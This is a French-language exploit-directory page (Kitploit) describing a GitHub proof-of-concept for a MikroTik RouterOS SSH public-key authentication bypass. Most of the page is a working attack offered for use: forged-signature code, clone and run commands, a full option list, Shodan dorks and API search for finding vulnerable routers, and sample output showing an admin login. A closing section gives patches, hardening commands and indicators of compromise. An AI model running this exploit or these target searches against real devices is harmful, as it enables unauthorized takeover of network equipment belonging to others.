Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/blackhatexploitation/exploit-mikrotik-2026
ReconnaissanceAnalyse des VulnérabilitésExploitationCollecte d'InformationsSécurité RéseauTests d'IntrusionAuthentification
GitHubblackhatexploitation/exploit-mikrotik-2026

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

exploit-mikrotik-2026

CVE-2026-67276 Exploit de contournement de l'authentification SSH de MikroTik RouterOS

Voir le dépôt
il y a 8h 16mPas encore vérifié
Partager

CVE-2026-67276 - Exploit de contournement d'authentification SSH MikroTrik

CVE Severity Type Platform

Contournement de l'authentification par clé publique SSH MikroTik RouterOS - Aucune clé privée requise

Une preuve de concept pour CVE-2026-67276 (MikroTrick), une vulnérabilité critique de contournement d'authentification dans l'implémentation SSH de MikroTik RouterOS qui permet aux attaquants de s'authentifier en tant que n'importe quel utilisateur sans posséder leur clé privée.


Table des matières

  • Présentation de la vulnérabilité
  • Comment ça fonctionne
  • Versions concernées
  • Installation
  • Utilisation
  • Reconnaissance Shodan
  • Détails techniques
  • Remédiation
  • Références
  • Avertissement

Présentation de la vulnérabilité

La chaîne d'attaque MikroTrick

CVE-2026-67276 fait partie d'une chaîne d'attaque plus large surnommée « MikroTrick » par CERT PL, qui a été observée comme étant activement exploitée dans la nature :


Comment ça fonctionne

La vulnérabilité

L'authentification SSH de RouterOS présente un défaut critique dans la façon dont elle valide les clés publiques :

  1. Bug de correspondance de clé : RouterOS fait correspondre le blob de clé publique SSH présenté avec les clés autorisées en utilisant uniquement (type de clé, module), en omettant complètement l'exposant
  2. Exposant provenant du client : La vérification de signature utilise l'exposant du blob fourni par le client, et non la clé stockée
  3. Falsification triviale : Présenter {ssh-rsa, e=1, n=module_victime} rend la vérification triviale

Base mathématique

root@kitploit:~
Vérification RSA standard :  sig^65537 mod n == attendu  (nécessite la clé privée)
Vérification exploitée :     sig^1 mod n == sig           (AUCUNE clé privée nécessaire !)

Avec l'exposant e=1, la vérification de signature devient :

root@kitploit:~
sig^1 mod n == sig

Cela signifie que la « signature » est simplement le message encodé EMSA-PKCS1-v1_5 lui-même - constructible par quiconque connaît le module public de la victime.

Prérequis de l'attaque

  1. Nom d'utilisateur cible d'un compte avec une clé RSA autorisée
  2. Le module public RSA n de cette clé autorisée (à partir du fichier .pub, des connexions précédentes, etc.)
  3. Accès réseau au port SSH

Versions concernées

BranchePlage vulnérableVersion corrigée
6.x6.0 - 6.49.206.49.21+

Installation

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/BlackHatExploitation/exploit-mikrotik-2026.git
cd exploit-mikrotik-2026

# Installer les dépendances
pip install paramiko cryptography

Utilisation

Démarrage rapide

root@kitploit:~
# Exploit de base - génère automatiquement la clé, détecte la version
python3 full_exploit.py --host 192.168.88.1 --username admin

# Exécuter une commande après l'authentification
python3 full_exploit.py --host 192.168.88.1 --username admin --exec '/system resource print'

# Port personnalisé
python3 full_exploit.py --host 192.168.88.1 --port 2222 --username admin

Utilisation d'une clé publique existante

root@kitploit:~
# Si vous disposez du fichier de clé publique de la victime
python3 full_exploit.py --host 192.168.88.1 --username admin --pubkey victim.pub

# Ou fournir le module directement
python3 full_exploit.py --host 192.168.88.1 --username admin --modulus-hex "00:ab:cd:..."

Détection de version

L'exploit détecte automatiquement la version de RouterOS et vérifie le statut de vulnérabilité :

root@kitploit:~
# Forcer l'exploit même sur une version non-MikroTik ou inconnue
python3 full_exploit.py --host 192.168.88.1 --username admin --skip-version-check

Toutes les options

root@kitploit:~
--host              IP/nom d'hôte RouterOS cible (requis)
--port              Port SSH (défaut : 22)
--username          Nom d'utilisateur RouterOS cible (requis)
--pubkey            Fichier de clé publique RSA (généré automatiquement si non fourni)
--modulus-hex       Module RSA en hexadécimal (alternative à --pubkey)
--algos             Algorithmes de signature (défaut : ssh-rsa,rsa-sha2-256)
--exec              Commande à exécuter après l'authentification
--exp-enc           Encodage de l'exposant : canonique (1 octet) ou aligné (3 octets)
--timeout           Délai d'expiration de connexion (défaut : 15,0 secondes)
--skip-version-check    Ignorer la vérification de version RouterOS
--shodan-dorks      Afficher les requêtes de recherche Shodan
--shodan-search     Rechercher des cibles via l'API Shodan
--shodan-key        Clé API Shodan
--shodan-query      Requête Shodan personnalisée
--shodan-limit      Limite de résultats Shodan (défaut : 100)

Reconnaissance Shodan

Afficher les dorks

root@kitploit:~
python3 full_exploit.py --shodan-dorks

Rechercher via l'API Shodan

root@kitploit:~
# Recherche de base
python3 full_exploit.py --shodan-search --shodan-key VOTRE_CLE_API

# Requête personnalisée
python3 full_exploit.py --shodan-search --shodan-key VOTRE_CLE --shodan-query 'MikroTik port:22 country:US'

Requêtes Shodan utiles


Détails techniques

Structure du blob de clé publique SSH

root@kitploit:~
string    "ssh-rsa"
mpint     e (exposant public)  <- L'attaquant fournit e=1
mpint     n (module)          <- Module réel de la victime

Génération de signature falsifiée

root@kitploit:~
# La « signature » est simplement les données d'authentification encodées EMSA-PKCS1-v1_5
def forged_signature(data, sig_alg, n):
    k = (n.bit_length() + 7) // 8
    block = emsa_pkcs1_v15(data, sig_alg, k)
    return block  # Ceci EST la signature valide lorsque e=1

Notes sur le format filaire

  • La chaîne de type interne du blob reste ssh-rsa même pour les algorithmes rsa-sha2-256/512
  • L'algorithme de signature ne figure que dans le champ d'algorithme externe
  • Les encodages canonique (1 octet) et aligné (3 octets) de e=1 fonctionnent tous deux sur les versions vulnérables

Exemple de sortie

root@kitploit:~
[*] Exploit CVE-2026-67276 MikroTrick
[*] Cible : 192.168.88.1:22

[*] Détection de la version RouterOS...
[*] Bannière SSH : SSH-2.0-ROSSSH-7.23.3
[*] Version RouterOS : 7.23.3
[+] VERSION VULNÉRABLE - CVE-2026-67276 applicable

[*] Génération d'une paire de clés RSA 2048 bits...
[+] Clé privée enregistrée : /path/to/exploit_key
[+] Clé publique enregistrée :  /path/to/exploit_key.pub
[*] Module : 2048 bits | e=1 falsifié
[*] Encodage de l'exposant : canonique (01)

[*] Tentative rsa-sha2-256 ...
[+] AUTHENTIFIÉ en tant que 'admin' via rsa-sha2-256
[+] CVE-2026-67276 CONFIRMÉ - la cible est vulnérable
--- sortie de la commande ---
                uptime: 14d23h45m12s
               version: 7.23.3 (stable)
            build-time: Sep/01/2026 12:00:00

Remédiation

1. Mettre à niveau immédiatement

root@kitploit:~
# Vérifier la version actuelle
/system resource print

# Mettre à niveau vers la version corrigée
/system package update download
/system reboot

Versions minimales sûres :

  • Branche 6.x : 6.49.21
  • 7.x stable : 7.23.4
  • 7.x testing : 7.24.2

2. Désactiver SSH si non requis

root@kitploit:~
/ip service disable ssh

3. Restreindre l'accès SSH

root@kitploit:~
# Par adresse IP
/ip service set ssh address=192.168.88.0/24

# Règle de pare-feu
/ip firewall filter add chain=input dst-port=22 protocol=tcp \
    src-address=!192.168.88.0/24 action=drop

4. Vérifier une éventuelle compromission

root@kitploit:~
# Vérifier les utilisateurs suspects
/user print

# Vérifier l'utilisateur « ops » (indicateur connu d'attaquant)
/user print where name=ops

# Vérifier le statut de l'appareil signalé
/system/device-mode/print

# Vérifier les journaux
/log print where topics~"ssh"

IOC connus :

  • Entrées de journal : login failure for user -2 via ssh
  • Utilisateur privilégié inconnu ops
  • Marqueur « Flagged » de l'appareil
  • IP d'attaquants : 82.192.72.4, 103.102.31.18

Références

  • Avis CERT PL
  • Détails CVE CERT PL
  • Bulletin de sécurité MikroTik
  • RFC 8017 - PKCS#1 v2.2
  • RFC 8332 - Utilisation des clés RSA avec SHA-256/512 dans SSH
  • RFC 4252 - Protocole d'authentification SSH

Avertissement

⚠️ Cet outil est fourni uniquement pour les tests de sécurité autorisés et à des fins éducatives.

  • Utilisez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test
  • L'accès non autorisé à des systèmes informatiques est illégal en vertu de la CFAA, du Computer Misuse Act et des lois similaires dans le monde entier
  • Les auteurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil
  • En utilisant cet outil, vous acceptez de l'utiliser de manière responsable et légale

Licence

Licence MIT - Voir LICENSE pour plus de détails.


Auteur

PoC de recherche en sécurité - Implémentation en laboratoire CVE-2026-67276

Mettez une étoile à ce dépôt si vous le trouvez utile !

Télécharger l’outil
DétailInformation
ID CVECVE-2026-67276
SévéritéCritique (CVSS 9.8)
CWECWE-347 (Vérification incorrecte de la signature cryptographique)
Vecteur d'attaqueRéseau
AuthentificationAucune
ComplexitéFaible
ImpactCompromission totale de l'appareil
CVETypeDescription
CVE-2026-67276Contournement d'authentificationContournement de l'authentification par clé publique SSH via falsification de l'exposant
CVE-2026-86060Élévation de privilègesInjection d'arguments via le nom d'utilisateur
CVE-2026-67279Contournement d'authentificationConnexion SSH sans userauth complété
CVE-2026-67277Divulgation d'informationsFuite de mémoire du noyau via bandwidth-test
CVE-2026-67278Contournement de signatureAcceptation de signature X.509 malformée
CVE-2026-67281Lecture de fichierLecture de fichier racine WebFig via jsproxy
7.x stable
7.0 - 7.23.3
7.23.4+
7.x testing7.24.0 - 7.24.17.24.2+
CibleRequête
Tous les MikroTikMikroTik
MikroTik SSHMikroTik port:22
Winbox exposéport:8291
Panneau WebFighttp.title:RouterOS
RouterOS 6.49.xMikroTik "6.49"
RouterOS 7.xMikroTik "RouterOS v7"
Par paysMikroTik country:US
Indice de vulnérabilitéMikroTik ("6.49" OR "7.23" OR "7.24.0")